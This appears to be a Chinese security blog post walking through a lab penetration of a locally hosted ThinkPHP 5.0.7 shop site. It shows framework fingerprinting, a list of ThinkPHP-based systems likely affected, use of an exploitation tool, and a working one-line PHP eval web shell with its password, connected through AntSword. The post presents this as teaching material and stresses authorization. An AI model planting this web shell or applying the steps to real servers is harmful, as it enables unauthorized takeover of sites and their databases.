实操环境:
1.本地搭建的商城网站
2.谷歌浏览器及Wappalyzer插件
3.Thinkphp综合利用工具
实操过程:
直接访问网站首页,使用谷歌浏览器的Wappalyzer插件(后台回复“Wappalyzer”即可获取插件下载连接)进行网站的信息收集。至于如何搭建网站可以查看历史文章:
小谢,公众号:小谢取证利用本地宝塔搭建/重构网站(上)
可以看到,使用Wappalyzer插件收集到网站的一些基础信息。
(1)网站所使用的web中间件为nginx
(2)网站所使用的变成语言为PHP
但在这里没能看到其php的框架,我们加上一个不存在的模块:http://xiaoxiequzheng.com/xiaoxiequzheng,可以通过查看图标,也可以查看返回的信息,能明确是Thinkphp框架。
可以看到nginx信息与网站使用的是ThinkPHP框架,版本是5.0.7。
什么是Thinkphp?
ThinkPHP诞生于2006年,是一个国产开源的PHP开发框架,其借鉴了Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。ThinkPHP可在Windows和Linux等操作系统运行,支持MySql,Sqlite和PostgreSQL等多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
本次的实验环境:xxshop开源商城系统,是某网络有限公司开发的一套多商家模式的商城系统。适合企业及个人快速构建个性化网上商城。包含PC+IOS客户端+Adroid客户端+微商城,系统PC+后台是基于ThinkPHP5 MVC构架开发的跨平台开源软件,设计得非常灵活,具有模块化架构体系和丰富的功能,易于与第三方应用系统无缝集成,在设计上,包含相当全面,以模块化架构体系,让应用组合变得相当灵活,功能也相当丰富。
目录结构:
漏洞利用:
主要影响的版本为5.0.23和5.1.31之前的所有版本。
包括:
5.x < 5.1.31
5.x <= 5.0.23
以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响。
·
AdminLTE后台管理系统
layui后台管理系统
thinkcmf
H-ui.admin后台管理系统
tpshop
FsatAdmin
eyoucms
LarryCMS后台管理系统
tpadmin后台管理系统
snake后台管理系统
ThinkSNS
DolphinPHP后台管理系统
WeMall商城系统
CLTPHP
齐博CMS
DSMALL
YFCMF
HisiPHP后台管理系统
Tplay后台管理系统
lyadmin后台管理系统
haoid后台管理系统
·
我们当前测试的环境是5.0.7版本,符合漏洞利用范畴。
直接上神器。
可以看到存在两个漏洞,就可以利用其漏洞,上传小马。
一句话木马:<?php @eval($_POST['a']);?>
连接的密码为a
上传小马成功后,使用蚁剑进行连接。
·
URL地址:就是你上传一句话木马地址
·链接密码:链接密码在URL地址后面,一句话内容为
<?php @eval($_POST['a']);?> 那么链接密码就为a
·
编码
设置
:根据自己的需要选择,默认我们选择
UTF-8
·
连接
类型:你上传的一句话木马是什么类型的这里就选择什么类型
·
编码器
:
使用base64进行编码
连接成功。
虚拟终端:
文件管理:
数据库管理:
总结:
通过本地的实验一次简单的拿站过程,希望大佬勿喷,这篇确实水。也希望大家在面对服务器的网站时能够有更多的思路,但必须是在授权下进行。
原文始发于微信公众号(小谢取证):记一次商城站点渗透(针对指定站点渗透思路)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论